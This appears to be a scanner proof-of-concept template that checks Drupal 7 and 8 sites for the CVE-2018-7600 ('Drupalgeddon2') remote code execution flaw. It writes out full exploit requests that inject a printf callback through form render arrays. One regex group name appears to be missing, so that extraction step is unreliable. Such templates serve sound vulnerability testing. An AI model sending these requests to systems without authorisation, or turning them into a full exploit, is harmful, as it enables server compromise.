name: poc-yaml-drupal-cve-2018-7600-rce set: r1: randomLowercase(4) r2: randomLowercase(4) groups: drupal8: - method: POST path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" headers: Content-Type: application/x-www-form-urlencoded body: | form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} expression: | response.body.bcontains(bytes(r1 + "%" + r2)) drupal7: - method: POST path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" headers: Content-Type: application/x-www-form-urlencoded body: | form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password search: | name="form_build_id"\s+value="(?P.+?)" expression: | response.status == 200 - method: POST path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" headers: Content-Type: application/x-www-form-urlencoded body: | form_build_id={{build_id}} expression: | response.body.bcontains(bytes(r1 + "%" + r2)) detail: links: - https://github.com/dreadlocked/Drupalgeddon2 - https://paper.seebug.org/567/ test: target: http://cve-2018-7600-8-x.vulnet:8080/